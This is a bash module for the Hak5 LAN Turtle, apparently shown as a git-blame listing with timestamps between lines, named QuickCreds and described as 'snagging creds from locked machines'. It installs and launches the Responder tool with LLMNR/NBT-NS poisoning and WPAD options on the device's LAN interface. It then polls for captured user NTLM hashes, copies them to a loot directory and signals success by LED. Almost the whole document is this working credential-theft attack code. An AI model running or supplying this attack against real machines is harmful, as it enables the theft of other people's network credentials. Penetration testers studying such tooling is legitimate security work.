2016-09-12 17:17:01 +00:00
#!/bin/bash /usr/lib/turtle/turtle_module
2017-05-14 23:28:43 +00:00
VERSION="1.3"
2016-09-21 00:23:05 +00:00
DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink rapidly while QuickCreds is running. Upon capture of NTLM hash the amber LED will light solid. Author: Hak5Darren. Credit: Mubix."
2016-09-12 17:17:01 +00:00
CONF=/tmp/QuickCreds.form
: ${DIALOG_OK=0}
: ${DIALOG_CANCEL=1}
: ${DIALOG_HELP=2}
: ${DIALOG_EXTRA=3}
: ${DIALOG_ITEM_HELP=4}
: ${DIALOG_ESC=255}
2016-09-21 00:23:05 +00:00
2016-09-12 17:17:01 +00:00
function configure {
# dialog --title "QuickCreds" --msgbox "\n\
# Dependencies will be installed. An Internet connection is required.\n\
# Upon configuration creds will be saved to /root/loot/ on boot." 9 72
dialog --title "QuickCreds" \
--yesno "\nInstall dependencies and configure QuickCreds?\n\
An Internet connection is required for installation.\n" 8 60
response=$?
case $response in
0) ;;
1) exit ;;
255) exit ;;
esac
# Check to see if QuickCreds has already been configured
if [[ -d /root/loot || -s /root/loot/responder.log ]];
then
dialog --title "QuickCreds" --msgbox "\nThe QuickCreds module is already configured.\n\
Creds are saved to /root/loot.\nEnable this module to attack on boot." 9 72
exit 1
fi
# Check for Internet connection
ping -q -w 5 -c 1 lanturtle.com &> /dev/null && {
:
} || {
dialog --title "QuickCreds" --msgbox "\n\
The LAN Turtle is currently offline.\nPlease connect the LAN Turtle to the Internet and try again. " 9 72
exit 1
}
# Install dependencies
opkg update | dialog --progressbox "Updating opkg" 14 72
if [[ ! $(opkg list-installed | grep git) ]];
then
opkg install git | dialog --progressbox "Installing dependency git" 14 72
fi
if [[ ! $(opkg list-installed | grep python-sqlite3) ]];
then
opkg install python-sqlite3 | dialog --progressbox "Installing dependency python-sqlite3" 14 72
fi
if [[ ! $(opkg list-installed | grep screen) ]];
then
opkg install screen | dialog --progressbox "Installing dependency screen" 14 72
fi
if [[ ! $(opkg list-installed | grep python-openssl) ]];
then
opkg install python-openssl | dialog --progressbox "Installing dependency python-openssl" 14 72
fi
if [[ ! $(opkg list-installed | grep coreutils-sleep) ]];
then
opkg install coreutils-sleep | dialog --progressbox "Installing dependency coreutils-sleep" 14 72
fi
if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]];
then
rm -rf /etc/turtle/Responder
git clone git://github.com/lgandx/responder /etc/turtle/Responder -q | dialog --progressbox "Installing dependency responder" 14 72
2017-05-14 23:28:43 +00:00
rm -rf /etc/turtle/Responder/.git
2016-09-12 17:17:01 +00:00
fi
# Setup loot directory and complete setup
mkdir /root/loot
touch /root/loot/responder.log
dialog --title "QuickCreds" --msgbox "\n\
Configuration complete. Creds will be saved to /root/loot\n\
Enable this module to have it start the attack on boot.\n" 9 72
}
2016-09-21 00:23:05 +00:00
2016-09-12 17:17:01 +00:00
function start {
2016-09-21 00:23:05 +00:00
# Stop on-off-on DHCP blink pattern script
echo "Stopping DHCP Detect Blink Script"
/etc/init.d/dhcp_detect stop
echo ""
2016-09-12 17:17:01 +00:00
echo "QuickCreds started."
2016-09-21 00:23:05 +00:00
echo "LED will blink rapidly while QuickCreds is running."
echo "LED will light solid upon NTLM hash capture."
echo ""
2016-09-12 17:17:01 +00:00
echo "If starting this module from the Turtle Shell menu,"
echo "press CTRL+C to return."
echo "Starting attack..." >> /root/loot/responder.log
2016-09-21 00:23:05 +00:00
# Create new numbered loot directory and symlink it from Responder logs
2016-09-12 17:17:01 +00:00
cd /root/loot
2016-09-21 00:23:05 +00:00
dircount=$(ls -lad /root/loot/* | wc -l)
mkdir /root/loot/$((dircount))
2016-10-12 22:10:04 +00:00
# Delete all current Responder logs
2016-11-05 00:27:48 +00:00
rm -rf /etc/turtle/Responder/logs
2016-09-21 00:23:05 +00:00
ln -s /root/loot/$((dircount)) /etc/turtle/Responder/logs
2016-09-12 17:17:01 +00:00
# Stop dnsmasq
/etc/init.d/dnsmasq stop 1&> /dev/null
# Execute attack
2016-09-19 16:55:22 +00:00
screen -dmS responder bash -c 'cd /etc/turtle/Responder; python Responder.py -I br-lan -w -r -d -P'
2016-09-12 17:17:01 +00:00
# Blink upon hash capture
while true; do
2016-10-12 22:10:04 +00:00
# Grep for user creds and do not match on machine creds, machine usernames end in $
if [ $(grep -v '\$:' /etc/turtle/Responder/logs/*NTLM* 2>/dev/null) ];
2016-09-12 17:17:01 +00:00
then
if [[ ! $(cat /root/loot/responder.log | tail -n1) == *"Creds"* ]]
then
echo "Creds saved!" >> /root/loot/responder.log
2016-10-12 22:10:04 +00:00
#copy all responder logs to loot directory
cp /etc/turtle/Responder/logs/* /root/loot/$((dircount))
2016-09-21 00:23:05 +00:00
finished
2016-09-12 17:17:01 +00:00
fi
2016-09-21 00:23:05 +00:00
fi
2016-09-12 17:17:01 +00:00
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness
2016-09-21 00:23:05 +00:00
/usr/bin/sleep 0.04
2016-09-12 17:17:01 +00:00
echo 0 > /sys/class/leds/turtle\:yellow\:system/brightness
2016-09-21 00:23:05 +00:00
/usr/bin/sleep 0.04
2016-09-12 17:17:01 +00:00
done
}
2016-09-21 00:23:05 +00:00
function finished {
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness
exit
}
2016-09-12 17:17:01 +00:00
function stop {
kill $(ps | grep [R]esponder | awk {'print $1'})
/etc/init.d/dnsmasq start 1&> /dev/null
echo "QuickCreds Stopped"
}
2016-09-21 00:23:05 +00:00
2016-09-12 17:17:01 +00:00
function status {
if ps | grep -w -q [R]esponder.py; then echo "1"; else echo "0"; fi
}
